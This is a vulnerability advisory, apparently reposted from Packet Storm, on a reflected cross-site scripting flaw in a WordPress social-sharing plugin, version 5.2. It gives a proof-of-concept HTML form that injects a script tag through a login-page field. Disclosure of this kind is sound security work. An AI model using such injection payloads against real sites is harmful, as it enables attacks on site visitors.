WordPress 1-Click Retweet/Share/Like 5.2 Cross Site Scripting

Posted on Posted in Exploit

WordPress 1-click Retweet / Share / Like plugin version 5.2 suffers from a cross site scripting vulnerability

Title: WordPress '1-click Retweet/Share/Like' Plugin 
Version: 5.2
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-21
Download: 
- https://wordpress.org/plugins/1-click-retweetsharelike/
- https://plugins.svn.wordpress.org/1-click-retweetsharelike/
Notified Vendor/WordPress: 2015-06-21
==========================================================

## Plugin description
==========================================================
Adds Facebook Like, Facebook Share, Twitter, Google +1, LinkedIn Share, Facebook Recommendations. Automatic publishing of content to 20+ Social Networ

## Vulnerabilities
==========================================================
The plugin is vulnerable to reflected XSS.

PoC:
Submit the following request (no need to login first..)
<form method="POST" action="[URL]/wp-login.php"> 
   <input type="text" name="lacandsnw_networkpub_key" value=""><script>alert(1)</script>"><br />
  <input type="submit">
</form>


## Solution
==========================================================
No fix available

==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.

Quelle: Packet storm Security

Facebooktwittergoogle_plus